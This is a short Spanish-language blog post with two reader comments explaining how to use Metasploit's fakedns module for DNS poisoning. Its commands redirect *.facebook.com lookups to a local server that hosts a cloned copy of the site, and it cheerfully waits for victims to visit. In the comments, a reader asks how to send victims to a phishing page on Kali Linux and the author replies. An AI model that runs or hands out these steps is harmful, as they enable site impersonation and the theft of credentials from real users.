martes, 24 de julio de 2012

Fakedns de Metasploit



  Hace una semana publiqué un post sobre lo que podría llegar a hacer un atacante con un punto de acceso falso y un servidor DNS adaptado a sus necesidades. En la entrada había que configurar un servidor DNS para realizarlo y, aunque es muy flexible, hay veces en las que es un trabajo laborioso y con algo mas simple seria suficiente.

  Para solucionar estos problemas existe el modulo fakedns de metasploit que mediante una simple configuración permite realizar un envenenamiento DNS. Veamos como habilitarlo:

El primer paso es iniciar metasploit, para ello:
msfconsole
Ahora invocamos el modulo:
use auxiliary/server/fakedns 
 El siguiente paso es cambiar el TARGETACTION a fake :
set TARGETACTION FAKE
 A continuación definimos el dominio que será redireccionado:
set TARGETDOMAIN *.facebook.com
Especificamos la dirección a la que se redirigiran las consultas a los dominios especificados antes:
set TARGETHOST 192.168.0.108
donde 192.168.0.108 es la IP del servidor donde se encuentra la copia de la web que se ha suplantado.

Para finalizar solo queda lanzar el módulo:
run
Ya solo queda que las víctimas visiten las direcciones especificadas y :D  .

Nos leemos en breve,

5 0verl0ad Labs: Fakedns de Metasploit   Hace una semana  publiqué un  post  sobre lo que podría llegar a hacer un atacante con un punto de acceso falso y un servidor DNS adap...

2 comentarios:

Zoro Zoe dijo...

Si la IP a direccionar es mi pc, como seria para que fuera redireccionada a una pagina pishing alojada en mi pc con kali linux

Aetsu Alpha dijo...

Lo que se asume en el post es que la pagina web que será sustituida es la que cargara el servidor por defecto, es decir, la que se encuentra en el directorio raiz de este. Supongo que en las opciones del modulo se podrá cambiar (comando info), pero ahora no dispongo de los recursos de tiempo ni de hardware para probarlo xD.

< >